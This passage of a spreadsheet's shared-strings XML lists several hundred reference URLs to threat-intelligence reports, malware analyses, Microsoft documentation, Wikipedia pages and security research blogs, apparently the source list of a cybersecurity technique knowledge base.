    <t>https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/solarstorm-supernova/</t>
  </si>
  <si>
    <t>https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf</t>
  </si>
  <si>
    <t>https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/</t>
  </si>
  <si>
    <t>https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</t>
  </si>
  <si>
    <t>https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat</t>
  </si>
  <si>
    <t>https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique</t>
  </si>
  <si>
    <t>https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/</t>
  </si>
  <si>
    <t>https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/dotnet/visual-basic/</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/</t>
  </si>
  <si>
    <t>https://www.vmray.com/cyber-security-blog/osaminer-uses-applescripts-evade-detection-malware-analysis-spotlight/</t>
  </si>
  <si>
    <t>https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/</t>
  </si>
  <si>
    <t>https://www.varonis.com/blog/power-automate-data-exfiltration</t>
  </si>
  <si>
    <t>https://twitter.com/vector_sec/status/896049052642533376</t>
  </si>
  <si>
    <t>https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities</t>
  </si>
  <si>
    <t>http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf</t>
  </si>
  <si>
    <t>https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/</t>
  </si>
  <si>
    <t>https://www.virustotal.com/en/faq/</t>
  </si>
  <si>
    <t>https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf</t>
  </si>
  <si>
    <t>https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf</t>
  </si>
  <si>
    <t>https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html</t>
  </si>
  <si>
    <t>https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/</t>
  </si>
  <si>
    <t>https://www.whois.net/</t>
  </si>
  <si>
    <t>https://wald0.com/?p=179</t>
  </si>
  <si>
    <t>https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x46.html</t>
  </si>
  <si>
    <t>https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf</t>
  </si>
  <si>
    <t>https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf</t>
  </si>
  <si>
    <t>https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil</t>
  </si>
  <si>
    <t>https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/</t>
  </si>
  <si>
    <t>https://en.wikibooks.org/wiki/Grsecurity/The_RBAC_System</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/IEEE_802.1X</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Active_Directory</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/BIOS</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Binary-to-text_encoding</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Booting</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Browser_extension</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Character_encoding</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Code_signing</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Control-flow_integrity</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Duqu</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/List_of_file_signatures</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/HTML_Application</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Ifconfig</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Man-in-the-browser</t>
  </si>
  <si>
    <t>http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Password_cracking</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Public-key_cryptography</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Root_certificate</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Rootkit</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Screensaver</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Server_Message_Block</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Shared_resource</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Visual_Basic_for_Applications</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Microsoft_Windows_library_files</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Windows_Registry</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Pwdump</t>
  </si>
  <si>
    <t>https://www.winosbite.com/verclsid-exe/</t>
  </si>
  <si>
    <t>https://www.rarlab.com/</t>
  </si>
  <si>
    <t>https://www.winzip.com/win/en/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-do-not-allow-anonymous-enumeration-of-sam-accounts-and-shares</t>
  </si>
  <si>
    <t>https://securelist.com/operation-applejeus/87553/</t>
  </si>
  <si>
    <t>https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/</t>
  </si>
  <si>
    <t>https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode</t>
  </si>
  <si>
    <t>https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/</t>
  </si>
  <si>
    <t>https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120</t>
  </si>
  <si>
    <t>http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/</t>
  </si>
  <si>
    <t>https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/</t>
  </si>
  <si>
    <t>https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/</t>
  </si>
  <si>
    <t>https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/</t>
  </si>
  <si>
    <t>http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html</t>
  </si>
  <si>
    <t>https://source.winehq.org/WineAPI/samlib.html</t>
  </si>
  <si>
    <t>https://github.com/skalkoto/winexe/</t>
  </si>
  <si>
    <t>https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf</t>
  </si>
  <si>
    <t>https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/</t>
  </si>
  <si>
    <t>https://www.wired.com/story/magecart-amazon-cloud-hacks/</t>
  </si>
  <si>
    <t>https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec</t>
  </si>
  <si>
    <t>https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/</t>
  </si>
  <si>
    <t>https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html</t>
  </si>
  <si>
    <t>https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/</t>
  </si>
  <si>
    <t>https://blog.xpnsec.com/becoming-system/</t>
  </si>
  <si>
    <t>https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75</t>
  </si>
  <si>
    <t>https://xorrior.com/persistent-credential-theft/</t>
  </si>
  <si>
    <t>https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/</t>
  </si>
  <si>
    <t>https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/</t>
  </si>
  <si>
    <t>https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/</t>
  </si>
  <si>
    <t>http://research.zscaler.com/2015/08/chinese-cyber-espionage-apt-group.html</t>
  </si>
  <si>
    <t>https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0</t>
  </si>
  <si>
    <t>https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike</t>
  </si>
  <si>
    <t>https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/</t>
  </si>
  <si>
    <t>https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/</t>
  </si>
  <si>
    <t>https://www.zdnet.com/article/north-korea-has-tried-to-hack-11-officials-of-the-un-security-council/</t>
  </si>
  <si>
    <t>https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/</t>
  </si>
  <si>
    <t>https://github.com/madler/zlib</t>
  </si>
  <si>
    <t>https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online</t>
  </si>
  <si>
    <t>https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware</t>
  </si>
  <si>
    <t>https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat</t>
  </si>
  <si>
    <t>https://www.zscaler.com/blogs/security-research/return-higaisa-apt</t>
  </si>
  <si>
    <t>http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html</t>
  </si>
  <si>
    <t>https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor</t>
  </si>
  <si>
    <t>https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html</t>
  </si>
  <si>
    <t>https://www.acunetix.com/websitesecurity/webserver-security/</t>
  </si>
  <si>
    <t>https://securelist.com/ad-blocker-with-miner-included/101105/</t>
  </si>
  <si>
    <t>https://www.cisa.gov/uscert/ncas/alerts/TA18-106A</t>
  </si>
  <si>
    <t>https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/</t>
  </si>
  <si>
    <t>https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html</t>
  </si>
  <si>
    <t>https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/</t>
  </si>
  <si>
    <t>http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html</t>
  </si>
  <si>
    <t>https://wiki.archlinux.org/index.php/Systemd/Timers</t>
  </si>
  <si>
    <t>https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol</t>
  </si>
  <si>
    <t>https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html</t>
  </si>
  <si>
    <t>https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete</t>
  </si>
  <si>
    <t>https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf</t>
  </si>
  <si>
    <t>https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html</t>
  </si>
  <si>
    <t>https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/</t>
  </si>
  <si>
    <t>https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/chasing-avaddon-ransomware</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf</t>
  </si>
  <si>
    <t>https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/create-symbolic-links</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does</t>
  </si>
  <si>
    <t>https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/</t>
  </si>
  <si>
    <t>https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)</t>
  </si>
  <si>
    <t>https://cyber.dhs.gov/assets/report/ar-16-20173.pdf</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Diantz/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=2053</t>
  </si>
  <si>
    <t>https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf</t>
  </si>
  <si>
    <t>https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf</t>
  </si>
  <si>
    <t>https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c</t>
  </si>
  <si>
    <t>https://exatrack.com/public/Tricephalic_Hellkeeper.pdf</t>
  </si>
  <si>
    <t>https://www.f-secure.com/weblog/archives/00002576.html</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/</t>
  </si>
  <si>
    <t>https://fileinfo.com/extension/plist</t>
  </si>
  <si>
    <t>https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior</t>
  </si>
  <si>
    <t>https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a</t>
  </si>
  <si>
    <t>http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf</t>
  </si>
  <si>
    <t>https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/</t>
  </si>
  <si>
    <t>https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf</t>
  </si>
  <si>
    <t>http://www.hexed.in/2019/07/osxdok-analysis.html</t>
  </si>
  <si>
    <t>http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html</t>
  </si>
  <si>
    <t>http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html</t>
  </si>
  <si>
    <t>https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/</t>
  </si>
  <si>
    <t>http://www.megasecurity.org/papers/Rootkits.pdf</t>
  </si>
  <si>
    <t>https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/</t>
  </si>
  <si>
    <t>https://itm4n.github.io/windows-registry-rpceptmapper-eop/</t>
  </si>
  <si>
    <t>https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/</t>
  </si>
  <si>
    <t>https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/</t>
  </si>
  <si>
    <t>https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/</t>
  </si>
  <si>
    <t>https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets</t>
  </si>
  <si>
    <t>https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials</t>
  </si>
  <si>
    <t>https://www.ise.io/casestudies/password-manager-hacking/</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques</t>
  </si>
  <si>
    <t>https://www.real-world-systems.com/docs/launchdPlist.1.html</t>
  </si>
  <si>
    <t>https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/</t>
  </si>
  <si>
    <t>https://libzip.org/</t>
  </si>
  <si>
    <t>https://themittenmac.com/what-does-apt-activity-look-like-on-macos/</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/foundation</t>
  </si>
  <si>
    <t>http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553</t>
  </si>
  <si>
    <t>https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a</t>
  </si>
  <si>
    <t>http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html</t>
  </si>
  <si>
    <t>https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication</t>
  </si>
  <si>
    <t>http://www.magnusviri.com/Mac/what-is-emond.html</t>
  </si>
  <si>
    <t>https://man7.org/linux/man-pages/man1/mailx.1p.html</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/detections/osx-dubrobber/</t>
  </si>
  <si>
    <t>https://github.com/ARMmbed/mbed-crypto</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/</t>
  </si>
  <si>
    <t>https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware</t>
  </si>
  <si>
    <t>https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/</t>
  </si>
  <si>
    <t>https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x25.html</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x26.html</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x3B.html</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x3D.html</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x4E.html</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x31.html</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x44.html</t>
  </si>
  <si>
    <t>https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen</t>
  </si>
  <si>
    <t>https://github.com/decalage2/oletools</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/</t>
  </si>
  <si>
    <t>https://www.passcape.com/windows_password_recovery_vault_explorer</t>
  </si>
  <si>
    <t>https://github.com/bontchev/pcodedmp</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection</t>
  </si>
  <si>
    <t>https://antman1p-30185.medium.com/defeating-malicious-launch-persistence-156e2b40fc67</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/</t>
  </si>
  <si>
    <t>https://datatracker.ietf.org/doc/html/rfc2131</t>
  </si>
  <si>
    <t>https://datatracker.ietf.org/doc/html/rfc3315</t>
  </si>
  <si>
    <t>https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/</t>
  </si>
  <si>
    <t>https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/</t>
  </si>
  <si>
    <t>http://man7.org/linux/man-pages/man2/setuid.2.html</t>
  </si>
  <si>
    <t>https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/</t>
  </si>
  <si>
    <t>https://man7.org/linux/man-pages/man1/split.1.html</t>
  </si>
  <si>
    <t>http://sqlmap.org/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html</t>
  </si>
  <si>
    <t>https://www.sudo.ws/</t>
  </si>
  <si>
    <t>https://www.synack.com/2017/01/01/mac-malware-2016/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/#t1105</t>
  </si>
  <si>
    <t>https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html</t>
  </si>
  <si>
    <t>https://arxiv.org/abs/1809.05681</t>
  </si>
  <si>
    <t>https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/</t>
  </si>
  <si>
    <t>https://tlseminar.github.io/downgrade-attacks/</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html</t>
  </si>
  <si>
    <t>https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/</t>
  </si>
  <si>
    <t>https://versprite.com/blog/exploiting-vyprvpn-for-macos/</t>
  </si>
  <si>
    <t>https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/</t>
  </si>
  <si>
    <t>https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&amp;tabid=2</t>
  </si>
  <si>
    <t>https://taomm.org/vol1/pdfs.html</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x59.html</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x60.html</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc</t>
  </si>
  <si>
    <t>https://www.ghacks.net/2017/06/10/windows-msc-files-overview/</t>
  </si>
  <si>
